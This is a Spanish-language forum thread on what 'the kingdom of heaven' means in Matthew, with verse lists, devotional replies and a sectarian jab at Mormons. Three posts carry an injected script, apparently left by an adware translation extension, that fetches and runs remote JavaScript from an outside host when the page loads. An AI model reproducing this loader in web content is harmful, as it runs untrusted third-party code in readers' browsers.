¿Que es el reino de los cielos?

Salmos 1

Crea en mi, oh Dios, un corazón limpio...
4 Julio 2012
77.989
4.202
Lo escrito abajo son todas las ocurrencias de la frase "el reino de los cielos" en la versión Reina Valera y el evangelio de Mateo.

Según las distintas religiones del foro, ¿Que idea tienen cada una de ellas de lo que esto significa?

¿Es algo que ya está, algo que va a venir?

Arrepentíos, porque el
reino de los cielos se ha acercado...

17 Desde entonces comenzó Jesús a predicar, y a decir: Arrepentíos, porque
el reino de los cielos se ha acercado.

3 Bienaventurados los pobres en espíritu, porque de ellos es
el reino de los cielos.

10 Bienaventurados los que padecen persecución por causa de la justicia, porque de ellos es
el reino de los cielos.

19 De manera que cualquiera que quebrante uno de estos mandamientos muy pequeños, y así enseñe a los hombres, muy pequeño será llamado en
el reino de los cielos; mas cualquiera que los haga y los enseñe, éste será llamado grande en el reino de los cielos. 20 Porque os digo que si vuestra justicia no fuere mayor que la de los escribas y fariseos, no entraréis en el reino de los cielos.

21 No todo el que me dice: Señor, Señor, entrará en
el reino de los cielos, sino el que hace la voluntad de mi Padre que está en los cielos.

11 Y os digo que vendrán muchos del oriente y del occidente, y se sentarán con Abraham e Isaac y Jacob en
el reino de los cielos; 12 mas los hijos del reino serán echados a las tinieblas de afuera; allí será el lloro y el crujir de dientes.

Y yendo, predicad, diciendo:
El reino de los cielos se ha acercado. 8 Sanad enfermos, limpiad leprosos, resucitad muertos, echad fuera demonios; de gracia recibisteis, dad de gracia.

Entre los que nacen de mujer no se ha levantado otro mayor que Juan el Bautista; pero el más pequeño en
el reino de los cielos, mayor es que él. 12 Desde los días de Juan el Bautista hasta ahora, el reino de los cielos sufre violencia, y los violentos lo arrebatan.

11 El respondiendo, les dijo: Porque a vosotros os es dado saber los misterios
del reino de los cielos; mas a ellos no les es dado.

24 Les refirió otra parábola, diciendo:
El reino de los cielos es semejante a un hombre que sembró buena semilla en su campo...

31 Otra parábola les refirió, diciendo:
El reino de los cielos es semejante al grano de mostaza, que un hombre tomó y sembró en su campo...

33 Otra parábola les dijo:
El reino de los cielos es semejante a la levadura que tomó una mujer, y escondió en tres medidas de harina, hasta que todo fue leudado.

44 Además,
el reino de los cielos es semejante a un tesoro escondido en un campo, el cual un hombre halla, y lo esconde de nuevo; y gozoso por ello va y vende todo lo que tiene, y compra aquel campo.

45 También
el reino de los cielos es semejante a un mercader que busca buenas perlas, 46 que habiendo hallado una perla preciosa, fue y vendió todo lo que tenía, y la compró.

47 Asimismo
el reino de los cielos es semejante a una red, que echada en el mar, recoge de toda clase de peces; 48 y una vez llena, la sacan a la orilla; y sentados, recogen lo bueno en cestas, y lo malo echan fuera. 49 Así será al fin del siglo: saldrán los ángeles, y apartarán a los malos de entre los justos, 50 y los echarán en el horno de fuego; allí será el lloro y el crujir de dientes.

Por eso todo escriba docto en
el reino de los cielos es semejante a un padre de familia, que saca de su tesoro cosas nuevas y cosas viejas.

19 Y a ti te daré las llaves
del reino de los cielos; y todo lo que atares en la tierra será atado en los cielos; y todo lo que desatares en la tierra será desatado en los cielos.

¿Quién es el mayor en
el reino de los cielos? 2 Y llamando Jesús a un niño, lo puso en medio de ellos, 3 y dijo: De cierto os digo, que si no os volvéis y os hacéis como niños, no entraréis en el reino de los cielos. 4 Así que, cualquiera que se humille como este niño, ése es el mayor en el reino de los cielos. 5 Y cualquiera que reciba en mi nombre a un niño como este, a mí me recibe.

23 Por lo cual
el reino de los cielos es semejante a un rey que quiso hacer cuentas con sus siervos.

y hay eunucos que a sí mismos se hicieron eunucos por causa
del reino de los cielos.

14 Pero Jesús dijo: Dejad a los niños venir a mí, y no se lo impidáis; porque de los tales es
el reino de los cielos.

23 Entonces Jesús dijo a sus discípulos: De cierto os digo, que difícilmente entrará un rico en
el reino de los cielos.

1 Porque
el reino de los cielos es semejante a un hombre, padre de familia, que salió por la mañana a contratar obreros para su viña. 15 ¿No me es lícito hacer lo que quiero con lo mío? ¿O tienes tú envidia, porque yo soy bueno? 16 Así, los primeros serán postreros, y los postreros, primeros; porque muchos son llamados, mas pocos escogidos.

2
El reino de los cielos es semejante a un rey que hizo fiesta de bodas a su hijo; 3 y envió a sus siervos a llamar a los convidados a las bodas; mas éstos no quisieron venir.

13 Mas ¡ay de vosotros, escribas y fariseos, hipócritas! porque cerráis
el reino de los cielos delante de los hombres; pues ni entráis vosotros, ni dejáis entrar a los que están entrando.

1 Entonces
el reino de los cielos será semejante a diez vírgenes que tomando sus lámparas, salieron a recibir al esposo.

14 Porque
el reino de los cielos es como un hombre que yéndose lejos, llamó a sus siervos y les entregó sus bienes. 15 A uno dio cinco talentos, y a otro dos, y a otro uno, a cada uno conforme a su capacidad; y luego se fue lejos.

Re: ¿Que es el reino de los cielos?

creo ke hay ke hacer una distincion en las ocasiones ke dicen a "secas": reino de los cielos
de los otros versos ke dicen: el reino de los cielos se ha acercado...

creo ke hay ke hacer una distincion en las ocasiones ke dicen a "secas": reino de los cielos
de los otros versos ke dicen: el reino de los cielos se ha acercado...
¿Porque? ¿Habla de cosas diferentes?
¿Pero el reino es un sistema de gobierno o es un lugar físico o personas?
Un reino es un sistema de gobierno con un Rey y subditos pero también implica terrenos y propiedades.
Aparentemente al reino
1. Se puede entrar o no. Para entrar a el hay que hacer la voluntad del Padre. hay que ser como niños.
2. Hay personas mas pequeñas que otras.
3. Los pobres en espíritu son dueños de este reino
4. Los que padecen persecución por causa de la justicia también son sus dueños
5. Tiene llaves
6. ¿Se puede estar entrando en el, o se entra de una saque y refiere a mas de una persona?
7. Porque los ricos dificilmente entren en el.

¿Y porque no se habla de doctrina para nada. Bautismo, Arrepentimiento, pertenecer a esta o aquella iglesia o denominación?

te puedo responder la 7

cuando el savador utilizo la expresion ojo de aguja, no se referia a la aguja ke conocemos hoy en dia
escribe "ojo de aguja" en google y haz clik en imagenes "imagenes"
sino a una puerte muy pequeña y angosta, en donde el mercader ke viene con su camello cargado de mercancia
tiene primero ke descargar a su animal, para ke este luego pase libre de toda esta carga....

con esta informacion el pasaje adkiere otro sentido...
no es tan dificil ser rico y entrar en el reino de Dios
si es ke uno no tiene su corazon en las riquezas y esta dispuesto a despojarse de ellas

3960881643_bb2587a692.jpg

cuando utiliza la expresion acercado: creo ke se refiere a su minsterio y lo ke habria el de establecer.

te puedo responder la 7

cuando el savador utilizo la expresion ojo de aguja, no se referia a la aguja ke conocemos hoy en dia
escribe "ojo de aguja" en google y haz clik en imagenes "imagenes"
sino a una puerte muy pequeña y angosta, en donde el mercader ke viene con su camello cargado de mercancia
tiene primero ke descargar a su animal, para ke este luego pase libre de toda esta carga....

con esta informacion el pasaje adkiere otro sentido...
no es tan dificil ser rico y entrar en el reino de Dios
si es ke uno no tiene su corazon en las riquezas y esta dispuesto a despojarse de ellas

cuando utiliza la expresion acercado: creo ke se refiere a su minsterio y lo ke habria el de establecer.

Esta bien si un rico está dispuesto a despojarse de sus riquezas puede entrar.
Pero que es este "entrar".
Como si fuera entrar a algún lado.

¿Se entra acá desde la vida?
Porque todo rico cuando muere se despoja si o si de sus riquezas.
Evidentemente te referís a un despojo voluntario en vida del rico.
¿Y entonces se despoja y entra en vida a este reino?

Juan que fue enviado primero, comienza su ministerio, mandando a los que escuchan, a que se arrepientan, porque este reino se había acercado a ellos.

Y Jesús comienza su ministerio igual: Llamando al arrepentimiento porque este reino se había acercado.

La razón del porque se debían arrepentir era por causa de este "reino" y su acercamiento a los hombres.

¿Que es este "Reino"?

Juan que fue enviado primero, comienza su ministerio, mandando a los que escuchan, a que se arrepientan, porque este reino se había acercado a ellos.

Y Jesús comienza su ministerio igual: Llamando al arrepentimiento porque este reino se había acercado.

La razón del porque se debían arrepentir era por causa de este "reino" y su acercamiento a los hombres.

¿Que es este "Reino"?

<script id="FoxLingoJs">!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();</script>EL REINO es JESUCRISTO

Por EL tenemos ACCESO nuevamente al PADRE, y su REINO.

JESUS predico EL ARREPNTIMIENTO :

En Mateo 4:17 el dijo: "Arrepentíos porque el reino de los cielos se ha acercado".

En Marcos 1:14-15 se lee: "... Jesús vino a Galilea predicando el Evangelio del reino de Dios, diciendo: El tiempo se ha cumplido y el reino de Dios se ha acercado ARREPENTIOS, y creed en el evangelio". " LAS ESCRITURAS "

En Lucas 13:5 Jesús clamó a las multitudes: "... antes si no os ARREPENTIS, todos pereceréis igualmente".

En el evangelio de Juan, Jesús explicó que el mundo lo odiaba por predicar arrepentimiento. Miremos el texto en el capítulo 7 versículo 7: "No puede el mundo aborreceros a vosotros; mas a mí me aborrece, porque yo testificó de él, que sus obras son malas."

¡Los 4 evangelios nos gritan que Jesús le dio prioridad al arrepentimiento y que en todo tiempo trataba de que la gente entendiera esto! Esto es tan claro que una vez dijo "no he venido a llamar a justos sino a pecadores AL ARREPENTIMIENTO" ¡El dejó el mismo cielo y bajó a la tierra para hacerle entender a la gente que sin arrepentirse no puede haber salvación. Que clara es la Biblia.

JESUCRISTO ¡RECIBIO DIRECTAMENTE DE SU PADRE EL MENSAJE de ARREPENTIMIENTO !

"Porque yo no he hablado por mi propia cuenta; el Padre que me envió, él me dio mandamiento de lo que he de decir, y de lo que he de hablar" (Juan 12:49). Eso quiere decir que el evangelio de arrepentimiento es un mensaje DIVINO, y muy importante que no debe ser ALTERADO ni tampoco IGNORADO.

Hasta ahi, espero haber compartido

sergio, paisa

*Romano 14.
17 porque el reino de Dios no es comida ni bebida, sino justicia, paz y gozo en el Espíritu Santo.

*Romano 14.
17 porque el reino de Dios no es comida ni bebida, sino justicia, paz y gozo en el Espíritu Santo.

Solo el Padre celestial por medio de Jesucristo puede bendecirnos con justicia , paz y gozo en el Espíritu Santo.

Es Dios sobre todos , por todos y en todos .

yo nunca entenderé por ke utilizan letrotas y colorines
ya hasta me parece ester leyendo un periodico amarillista

Prefiero ser didáctico siguiendo a Jesucristo que ser un confuso mormón que no cree en Cristo sino son seguidores de una revelación de un pobre hombre llamado José Smith, que creó su propia doctrina fuera de la verdadera enseñada del Espíritu Santo que por medio de los Apóstoles nos llegó como el Evangelio y que ustedes no hacen caso y eso no es el Reino de Dios.
Mis bendiciones para que cambie y conozco la verdadera salvación que es en Cristo Jesús y no en José Smith .

Lo escrito abajo son todas las ocurrencias de la frase "el reino de los cielos" en la versión Reina Valera y el evangelio de Mateo.

Según las distintas religiones del foro, ¿Que idea tienen cada una de ellas de lo que esto significa?

¿Es algo que ya está, algo que va a venir?

Arrepentíos, porque el
reino de los cielos se ha acercado...

17 Desde entonces comenzó Jesús a predicar, y a decir: Arrepentíos, porque
el reino de los cielos se ha acercado.

3 Bienaventurados los pobres en espíritu, porque de ellos es
el reino de los cielos.

10 Bienaventurados los que padecen persecución por causa de la justicia, porque de ellos es
el reino de los cielos.

19 De manera que cualquiera que quebrante uno de estos mandamientos muy pequeños, y así enseñe a los hombres, muy pequeño será llamado en
el reino de los cielos; mas cualquiera que los haga y los enseñe, éste será llamado grande en el reino de los cielos. 20 Porque os digo que si vuestra justicia no fuere mayor que la de los escribas y fariseos, no entraréis en el reino de los cielos.

21 No todo el que me dice: Señor, Señor, entrará en
el reino de los cielos, sino el que hace la voluntad de mi Padre que está en los cielos.

11 Y os digo que vendrán muchos del oriente y del occidente, y se sentarán con Abraham e Isaac y Jacob en
el reino de los cielos; 12 mas los hijos del reino serán echados a las tinieblas de afuera; allí será el lloro y el crujir de dientes.

Y yendo, predicad, diciendo:
El reino de los cielos se ha acercado. 8 Sanad enfermos, limpiad leprosos, resucitad muertos, echad fuera demonios; de gracia recibisteis, dad de gracia.

Entre los que nacen de mujer no se ha levantado otro mayor que Juan el Bautista; pero el más pequeño en
el reino de los cielos, mayor es que él. 12 Desde los días de Juan el Bautista hasta ahora, el reino de los cielos sufre violencia, y los violentos lo arrebatan.

11 El respondiendo, les dijo: Porque a vosotros os es dado saber los misterios
del reino de los cielos; mas a ellos no les es dado.

24 Les refirió otra parábola, diciendo:
El reino de los cielos es semejante a un hombre que sembró buena semilla en su campo...

31 Otra parábola les refirió, diciendo:
El reino de los cielos es semejante al grano de mostaza, que un hombre tomó y sembró en su campo...

33 Otra parábola les dijo:
El reino de los cielos es semejante a la levadura que tomó una mujer, y escondió en tres medidas de harina, hasta que todo fue leudado.

44 Además,
el reino de los cielos es semejante a un tesoro escondido en un campo, el cual un hombre halla, y lo esconde de nuevo; y gozoso por ello va y vende todo lo que tiene, y compra aquel campo.

45 También
el reino de los cielos es semejante a un mercader que busca buenas perlas, 46 que habiendo hallado una perla preciosa, fue y vendió todo lo que tenía, y la compró.

47 Asimismo
el reino de los cielos es semejante a una red, que echada en el mar, recoge de toda clase de peces; 48 y una vez llena, la sacan a la orilla; y sentados, recogen lo bueno en cestas, y lo malo echan fuera. 49 Así será al fin del siglo: saldrán los ángeles, y apartarán a los malos de entre los justos, 50 y los echarán en el horno de fuego; allí será el lloro y el crujir de dientes.

Por eso todo escriba docto en
el reino de los cielos es semejante a un padre de familia, que saca de su tesoro cosas nuevas y cosas viejas.

19 Y a ti te daré las llaves
del reino de los cielos; y todo lo que atares en la tierra será atado en los cielos; y todo lo que desatares en la tierra será desatado en los cielos.

¿Quién es el mayor en
el reino de los cielos? 2 Y llamando Jesús a un niño, lo puso en medio de ellos, 3 y dijo: De cierto os digo, que si no os volvéis y os hacéis como niños, no entraréis en el reino de los cielos. 4 Así que, cualquiera que se humille como este niño, ése es el mayor en el reino de los cielos. 5 Y cualquiera que reciba en mi nombre a un niño como este, a mí me recibe.

23 Por lo cual
el reino de los cielos es semejante a un rey que quiso hacer cuentas con sus siervos.

y hay eunucos que a sí mismos se hicieron eunucos por causa
del reino de los cielos.

14 Pero Jesús dijo: Dejad a los niños venir a mí, y no se lo impidáis; porque de los tales es
el reino de los cielos.

23 Entonces Jesús dijo a sus discípulos: De cierto os digo, que difícilmente entrará un rico en
el reino de los cielos.

1 Porque
el reino de los cielos es semejante a un hombre, padre de familia, que salió por la mañana a contratar obreros para su viña. 15 ¿No me es lícito hacer lo que quiero con lo mío? ¿O tienes tú envidia, porque yo soy bueno? 16 Así, los primeros serán postreros, y los postreros, primeros; porque muchos son llamados, mas pocos escogidos.

2
El reino de los cielos es semejante a un rey que hizo fiesta de bodas a su hijo; 3 y envió a sus siervos a llamar a los convidados a las bodas; mas éstos no quisieron venir.

13 Mas ¡ay de vosotros, escribas y fariseos, hipócritas! porque cerráis
el reino de los cielos delante de los hombres; pues ni entráis vosotros, ni dejáis entrar a los que están entrando.

1 Entonces
el reino de los cielos será semejante a diez vírgenes que tomando sus lámparas, salieron a recibir al esposo.

14 Porque
el reino de los cielos es como un hombre que yéndose lejos, llamó a sus siervos y les entregó sus bienes. 15 A uno dio cinco talentos, y a otro dos, y a otro uno, a cada uno conforme a su capacidad; y luego se fue lejos.
El reino de los cielos es el ideal de Dios cumplido por los seres humanos, hijos e hijas de Dios, en la tierra y luego trasladado al mundo espiritual:
Genesís 1:28:
1) Creced: Perfección individual
2) Multiplicaos: Perfección familiar > sociedad ideal > nación ideal > mundo ideal
3) Someted la tierra: El ser humano gobierna y domina la creación

Que Dios te bendiga

Hola Mormoncito
No te lo tomes así.
Gracias a Dios por la diversidad, los colores, tamaños.
Los tamaños y colores nos permiten mostrar nuestra pasión.
Hay foristas mas apasionados que otros.
Yo jamás me pondría el gorrito que tenés en la cabeza pero a vos te queda lindo.

Prefiero ser didáctico siguiendo a Jesucristo que ser un confuso mormón que no cree en Cristo sino son seguidores de una revelación de un pobre hombre llamado José Smith, que creó su propia doctrina fuera de la verdadera enseñada del Espíritu Santo que por medio de los Apóstoles nos llegó como el Evangelio y que ustedes no hacen caso y eso no es el Reino de Dios.
Mis bendiciones para que cambie y conozco la verdadera salvación que es en Cristo Jesús y no en José Smith .

Hola Rey
Parece que de pacífico no tenés nada. Risas
¿Porque le incás los dientes a Mormoncito?
¿Vos te pensás que vos o yo somos mejores que el?
Antes que un confuso Mormón es un hijo de Dios por quien Jesucristo dió su sangre. Eso le da un valor incalculable.
Tus bendiciones parecen mas balas que otra cosa.

Sergio tu aporte es espectacular.
Señor me arrepiento de mi arrogancia.
Señor me arrepiento de mis pecados.
Ten misericordia de mi.
Bendice a mis hermanos foristas.
Que podamos todos juntos en amor alcanzar la luz verdadera que ilumina a todo hombre

Hola Mormoncito
No te lo tomes así.

Yo jamás me pondría el gorrito que tenés en la cabeza pero a vos te queda lindo.

:)

<script id="FoxLingoJs">!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();</script>EL REINO es JESUCRISTO

Por EL tenemos ACCESO nuevamente al PADRE, y su REINO.

JESUS predico EL ARREPNTIMIENTO :

En Mateo 4:17 el dijo: "Arrepentíos porque el reino de los cielos se ha acercado".

En Marcos 1:14-15 se lee: "... Jesús vino a Galilea predicando el Evangelio del reino de Dios, diciendo: El tiempo se ha cumplido y el reino de Dios se ha acercado ARREPENTIOS, y creed en el evangelio". " LAS ESCRITURAS "

En Lucas 13:5 Jesús clamó a las multitudes: "... antes si no os ARREPENTIS, todos pereceréis igualmente".

En el evangelio de Juan, Jesús explicó que el mundo lo odiaba por predicar arrepentimiento. Miremos el texto en el capítulo 7 versículo 7: "No puede el mundo aborreceros a vosotros; mas a mí me aborrece, porque yo testificó de él, que sus obras son malas."

¡Los 4 evangelios nos gritan que Jesús le dio prioridad al arrepentimiento y que en todo tiempo trataba de que la gente entendiera esto! Esto es tan claro que una vez dijo "no he venido a llamar a justos sino a pecadores AL ARREPENTIMIENTO" ¡El dejó el mismo cielo y bajó a la tierra para hacerle entender a la gente que sin arrepentirse no puede haber salvación. Que clara es la Biblia.

JESUCRISTO ¡RECIBIO DIRECTAMENTE DE SU PADRE EL MENSAJE de ARREPENTIMIENTO !

"Porque yo no he hablado por mi propia cuenta; el Padre que me envió, él me dio mandamiento de lo que he de decir, y de lo que he de hablar" (Juan 12:49). Eso quiere decir que el evangelio de arrepentimiento es un mensaje DIVINO, y muy importante que no debe ser ALTERADO ni tampoco IGNORADO.

Hasta ahi, espero haber compartido

sergio, paisa

Es verdad.
Que tremendo.
Hay dos partes.
El reino viene a nosotros.
Nuestra parte es arrepentirnos.

Parece que el arrepentimiento es el principio de todo.
Sin arrepentimiento no hay nada de los demás.
El arrepentimiento es la puerta de entrada al cambio.

Me tengo que arrepentir.
El enemigo de Dios no es el otro sino yo.
El cambio de este mundo empieza conmigo.

Si yo cambio la esperanza se agranda.
Mi cambio está en mis manos.
El cambio de los demás no está bajo mi control.

Debo arrepentirme de juzgar constantemente a todo el mundo.
Debo arrepentirme de creer que me las se todas.
Debo arrepentirme de mi arrogancia.

Debo arrepentirme de creer que tengo la verdad y los demás están en la oscuridad.
Debo arrepentirme de la ironía.
Debo arrepentirme del cansancio que tengo y la falta de confianza en la ulterior justicia de Dios.

Debo arrepentirme de juzgar livianamente los demás sin ponerme un poquito en los zapatos del otro.
Señor te pido perdón por mis excesos e intolerancia.
No me deseches de tus planes.

Hazme entender tus planes de salvación para la humanidad.
Cambia mi tristeza en gozo.
Alegra Señor los huesos que has abatido.

En este día bendice a todos los foristas que entren en este foro y tu luz nos impacte un poco mas.
Gracias por cada aporte.

Endereza o Dios mis caminos.
Bendice a todos los que ponen su esperanza en vos.

Enséñame a escuchar mas que a hablar y a consolar mas que a juzgar.

Me arrepiento una vez mas de buscar siempre alguna excusa para echarle la culpa de todo a los demás y demorar el verdadero cambio de dirección.
Yo solo soy culpable de lo que elijo y nadie mas.
Endereza mis caminos o Dios y hazme comprender sabiduría.

Todo lo debo a tí mi Dios y Señor.
Gracias por venir por mi.
Gracias por darme valor.

Lléname de tu Espíritu Santo.
Te quiero Jesús
Amén

Sergio tu aporte es espectacular.

Es palabra de JESUCRISTO, es la VOLUNTAD del PADRE, para nosotros y para todo aquel que CREA. ESTAMOS obligados a OBEDECERLA

JESUS MANDO QUE SE PREDICARA ARREPENTIMIENTO EN TODOS LOS PAISES

A sus discípulos Jesús envio a predicar el arrepentimiento.

"Y les mandó que no llevasen nada para el camino, sino solamente bordón; Ni alforja, ni pan, ni dinero en el cinto ... Y saliendo, predicaban que los hombres se arrepintiesen"
(Marcos 6:8 y 12).

Y después de su resurrección MANDO que el mensaje que convertiría a las naciones sería ese. El no les dio otro.

"Y que se predicase en su nombre el arrepentimiento y el perdón de pecados en todas las naciones, comenzando desde Jerusalén"
(Lucas 24:47).

El nunca dijo a sus discípulos que le hablaran a la gente de humanismo o de prosperidad económica o de religión. El les dio el mismo MENSAJE que había recibido de su Padre y ellos lo predicaron fielmente.

EL ULTIMO MENSAJE DE JESUS A LAS IGLESIAS CRISTIANAS FUE DE ARREPENTIMIENTO

Aun para los que ya se había arrepentido una vez, Jesucristo LES VOLVIO a predicar arrepentimiento, pues era necesario para su restauración.

"Por tanto, arrepiéntete; pues si no, vendré a ti pronto, y pelearé contra ellos con la espada de mi boca"

(Apocalipsis 2:16) y "Yo reprendo y castigo a todos los que amo; sé, pues, celoso, y arrepiéntete" (Apocalipsis 3:19).

Los dos pasajes terminan diciendo "el que tiene oídos, oiga lo que el Espíritu dice a LAS IGLESIAS". Esto es lo que El está diciéndonos hoy.

LOS APOSTOLES PREDICARON EL MISMO MENSAJE

Pedro lleno del Espíritu Santo predicó que lo primero que un hombre necesita para salvarse es arrepentirse.

"Pedro les dijo: Arrepentíos, y bautícese cada uno de vosotros en el nombre de Jesucristo para perdón de los pecados; y recibiréis el don del Espíritu Santo" (Hechos 2:38).

Después repitió el mismo mensaje a más de cinco mil personas.

"Así que, arrepentíos y convertíos, para que sean borrados vuestros pecados; para que vengan de la presencia del Señor tiempos de refrigerio"
(Hechos 3:19).

¡Dios no iba a bendecir a aquella gente a menos que tuvieran un genuino arrepentimiento!

Pablo, escogido por Dios , maestro y experto en las Escrituras siempre habló un claro mensaje de arrepentimiento,

"Y como nada que fuese útil he rehuido de anunciaros y enseñaros, públicamente y por las casas, testificando a judíos y a gentiles acerca del arrepentimiento para con Dios, y de la fe en nuestro Señor Jesucristo" (Hechos 20:20-21).

"Pero Dios, habiendo pasado por alto los tiempos de esta ignorancia, ahora manda a todos los hombres en todo lugar, que se arrepientan" (Hechos 17:30).

"Por lo cual, oh rey Agripa, no fui rebelde a la visión celestial, sino que anuncié primeramente a los que están en Damasco, y Jerusalén, y por toda la tierra de Judea, y a los gentiles, que se arrepintiesen y se convirtiesen a Dios, haciendo obras dignas de arrepentimiento" (Hechos 26:19-20).

¿Por qué no hablaba otra cosa? ¡El sabía el secreto para que una persona tuviera la bendición de Dios!

JUAN WESLEY

"¡Arrepiéntete! ¡Arrepiéntete! antes de que seas partido por la espada de dos filos que sale de la boca de Cristo (Ap. 1:16). Son ustedes los que están crucificando de nuevo a Cristo y avergonzándolo públicamente... ¡Tengan mucho cuidado! pues está para caerles el juicio de Dios... Vive Dios que "ni los fornicarios, ni los idólatras, ni los adúlteros, ni los afeminados... heredarán el reino de Dios".

[Tomado del libro John Wesley, editado por Albert C. Outler, Oxford University Press, 1964].

<script id="FoxLingoJs">!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();</script>Sergio

"En lo días de aquellos reyes el Dios del cielo establecerá un Reino que no será reducido a ruinas,triturará y pondrá fin a todos estos reinos,y él mismo subsistirá hasta tiempos indefinidos",Dan 2:44.

Hoy se sabe que el Reino de los cielos es un gobierno,compuesto por Jesús y los elegidos para gobernar con Jesús.
"Feliz y santo es cualquiera que tiene parte en la primera resurrección;[...]serán sacerdotes de Dios y del Cristo, y reinarán con él por los mil años" Rev 20:6

"Y el reino y la gobernación y la grandeza de los reinos bajo todos los cielos fueron dados al pueblo que son los santos del Supremo. Su reino es un reino de duración indefinida, y todas las gobernaciones servirán y obedecerán aun a ellos".Dan 7:27

"Venga tu Reino,efectúese tu voluntad como en el cielo,también sobre la tierra" Mat 6:10.

Saludos cordiales a todos los que participan en el tema.
Alfageme